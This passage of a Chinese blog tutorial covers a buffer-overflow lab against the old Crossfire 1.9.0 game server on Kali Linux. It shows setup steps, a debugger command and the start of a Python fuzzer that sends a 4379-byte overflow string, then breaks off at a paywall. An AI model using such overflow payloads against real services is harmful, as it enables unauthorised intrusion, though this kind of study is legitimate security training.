Kali linux 学习笔记(十九)缓冲区溢出——linux(crossfire) 2020.3.1

最新推荐文章于 2021-04-13 00:34:47 发布
最新推荐文章于 2021-04-13 00:34:47 发布
阅读量1.4k 收藏 4
点赞数
分类专栏: kali linux 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44604541/article/details/104591616
版权
本文介绍了在Linux环境下,使用Kali Linux的edb-debug工具对Crossfire游戏1.9.0版本的缓冲区溢出漏洞进行分析和利用的过程。通过模糊测试确定4379个字符导致溢出,找到EIP控制点,并生成Shellcode成功获取远程连接。
摘要由CSDN通过智能技术生成

前言

上一篇在windows下用SLMail的漏洞实现缓冲区溢出
这次在Linux下用crossfire的漏洞实现缓冲区溢出

crossfire穿越火线

  • 多人在线rpg游戏
  • 1.9.0版本接受入站socket连接时存在缓冲区溢出
  • 新版本已经修复

这个漏洞是很早很早以前的
现在拿来学习和练手(笑)

1、实验准备

调试工具:edb-debug(kali自带)
运行平台:kali i486(32位)

crossfire准备
安装要注意路径

mv crossfire.tar.gz /usr/games/
cd /usr/games
tar zxpf crossfire.tar.gz
./crossfire
netstat -pentu #查看端口

本机准备
防止练手过程中,开放的端口被其他人攻击

iptables -A INPUT -p tcp --destination-port 13327 \~ -d 127.0.0.1 -j DROP #严格限制可以访问端口的IP
iptables -A INPUT -p tcp --destination-port 4444 \~ -d 127.0.0.1 -j DROP

调试

edb --run /usr/games/crossfire/bin/crossfire #通过edb调用crossfire

菜单栏debug下点两次run
出现小窗口监视

2、模糊测试

测试缓冲区溢出
根据已知信息
4379个字符刚好发生缓冲区溢出
(这个数据最初怎么得到的令人困惑)

脚本01.py

#!/usr/bin/python
import socket
host="127.0.0.1"
crash="\x41"*4379 #4379个"A",4379个字符刚好缓冲区溢出
buffer="\x11(setup sound "+crash+"\x90\x00#"
s=socket.socket
最低0.47元/天 解锁文章
思源湖的鱼
关注
专栏目录
kali缓冲区溢出笔记
fhl5203的博客
11-01 292
缓冲区溢出 当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被”撑爆”,从而覆盖了相邻内存区域的数据; 成功修改内存数据,可造成进程劫持,执行恶意代码,获取服务器控制权等后果 如何发现漏洞 源码审计 逆向工程 模糊测试 向程序堆找半随机的数据,根据内存变化判断溢出 数据生成器:生成随机,半随机数据 测试工具:识别溢出漏洞 windows缓冲区溢出 FUZZER 使用到的软件...
Kali linux 学习笔记(二十)缓冲区溢出——传输文件(tftp、ftp、vbscript) 2020.3.2
闵行小鱼塘
03-02 1096
在控制目标机后,为了上传工具以更好控制目标,我们需要传输文件过去,主要介绍下tftp、ftp、vbscript这几种方法
kali+php+缓冲区溢出,kali linux之edb--CrossFire缓冲区溢出
weixin_30880565的博客
04-13 422
漏洞的罪恶根源------变量,数据与代码边界不清,开发人员对用户输入没做过滤,或者过滤不严如这个脚本,写什么,显示什么,但是加上;,|,&&,后面加上系统命令,就执行命令了缓冲区溢出:当边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被撑爆,从而覆盖了相邻内存区域的数据,成功修改i内存数据,可造成进程劫持,执行恶意代码,获取服务器控制权等后果如何发现漏洞?源码审计...
缓冲区溢出笔记
weixin_34198797的博客
06-29 198
学习 转载于:https://www.cnblogs.com/fanzi2009/archive/2009/03/18/1415000.html
Kali学习笔记21:缓冲区溢出实验(漏洞发现)
weixin_30919919的博客
10-25 138
上一篇文章,我已经做好了缓冲区溢出实验的准备工作: https://www.cnblogs.com/xuyiqing/p/9835561.html 下面就是Kali虚拟机对缓冲区溢出的测试: 已经知道目标IP为:192.168.163.130 连接目标机器110端口成功,接下来进行测试 事先已经知道PASS命令存在缓冲区溢出漏洞: 只要在PASS后边输入的数据达到某一...
安全学习笔记缓冲区溢出
edu_aqniu的博客
10-30 830
数据与代码边界不清,导致程序执行代码 脚本: #! /bin/bash echo $1 在终端中运行脚本,参数写;或|加上命令,会被系统执行 • 源码审计  • 逆向工程 对编译后的文件反汇编 • 模糊测试  安装包,对程序发送数值,监视反馈 SLmail  安装后开放110,25,180,8376端口 Xp上添加smtp的25端口,pop3的
Kali linux 学习笔记(五十一)Web渗透——sqlmap自动注入 2020.3.28
闵行小鱼塘
03-28 3232
学习sqlmap自动注入
Kali linux 学习笔记(六十九)隧道——proxytunnel 2020.4.11
闵行小鱼塘
04-11 1206
本节学习proxytunnel
Kali linux 学习笔记(七十)隧道——sslh 2020.4.12
闵行小鱼塘
04-13 1055
学习sslh,一个端口多个服务
kali linux2020.3.txt
10-28
kali linux 物理机安装ISO文件,官方下载太慢了,我把链接放到txt文件了,永久有效,打开链接保持到网盘下载就可以了,kali Linux2020.3版本的,目前最新版。
CrossFire!!!
08-09
来这下载的童鞋都是朋友,我就不多介绍了,下载下来看看就知道了o(∩_∩)o
缓冲区溢出实例(二)–Linux
weixin_41082546的博客
03-12 698
原理:crossfire 1.9.0 版本接受入站 socket 连接时存在缓冲区溢出漏洞。 工具: 调试工具:edb; ###python在漏洞溢出方面的渗透测试和漏洞攻击中,具有很大的优势 实验对象:crossfire【多人在线RPG游戏】 运行平台:Kali i386 虚拟机【32位,计算机CPU位数是指地址总线位数,64位系统的寻址空间为2^64,寻址过大,难以处理,为了简化操作,...
缓冲区溢出(1)
11:00 啦
03-23 1062
缓冲区溢出(1) 最最简单的第一次实验.... 环境:VC 6.0  程序: #include #include void jmp() { printf("success!\n"); _exit(0); } int main() { int buffer[1]; buffer[2] = 0x00401020; //0x401020 //buff
小白日记18:kali渗透测试之缓冲区溢出实例(二)--Linux,穿越火线1.9.0
ZiXuanFY的博客
09-20 7394
Linux系统下穿越火线-缓冲区溢出 原理:1.9.0 版本接受入站 socket 连接时存在缓冲区溢出漏洞。 工具:调试工具:edb; 实验对象:crossfire 运行平台:Kali i686 虚拟机【32位,计算机CPU位数是指地址总线,64位系统的寻址空间过大,难以处理,为了简化本章操作,所以选用32位】
kali linux之edb--CrossFire缓冲区溢出
weixin_30563319的博客
02-23 486
漏洞的罪恶根源------变量,数据与代码边界不清,开发人员对用户输入没做过滤,或者过滤不严 如这个脚本,写什么,显示什么,但是加上;,|,&&,后面加上系统命令,就执行命令了 缓冲区溢出: 当边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被撑爆,从而覆盖了相邻内存区域的数据,成功修改i内存数据,可造成进程劫持,执行恶意代码,获取...
c++堆栈溢出怎么解决_CVE-2020-5135:SonicOS缓冲区溢出漏洞通告
weixin_39949297的博客
11-14 88
报告编号:B6-2020-101603
缓冲区溢出笔记(2.0)
关于学习本身
05-07 929
首先得会内存、寄存器还有程序运行的规则。 存储知识:      文件地址(File Offset):数据在PE文件中的地址,文件在磁盘上存放时相对于文件开头的偏移;      虚拟内存地址:每个进程都有的4G虚拟空间;      物理内存地址; 这三个地址要层层映射 内存:     代码区:存放二进制代码     数据区:存储全局变量     堆区:动态内存空间(还没太明
linux缓冲区溢出实验
cpyyes的专栏
09-06 2535
攻击过程    0.关闭随机地址空间的保护功能 1.编写攻击代码:   code 的值为课件上的值,这个值不一定能够使缓冲区溢出后调用到bug函数,因为我们不知道bug函数的代码会被放在哪个地址上。 2.在关闭gcc的栈保护功能下编译代码:   3.用gdb进行调试,查看main函数的汇编代码,找到调用copy后的下一指令的位置为0x0804849b    
kali linux 2020.1 设置中文详细教程
本文将指导如何在Kali Linux 2020.1版本中将系统设置为中文环境。这个过程主要包括切换到root用户、更换更新源、选择默认语言以及安装中文字体。 0x00 提示 在Kali Linux 2020.1中,默认用户已更改为"kali"。为了...
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值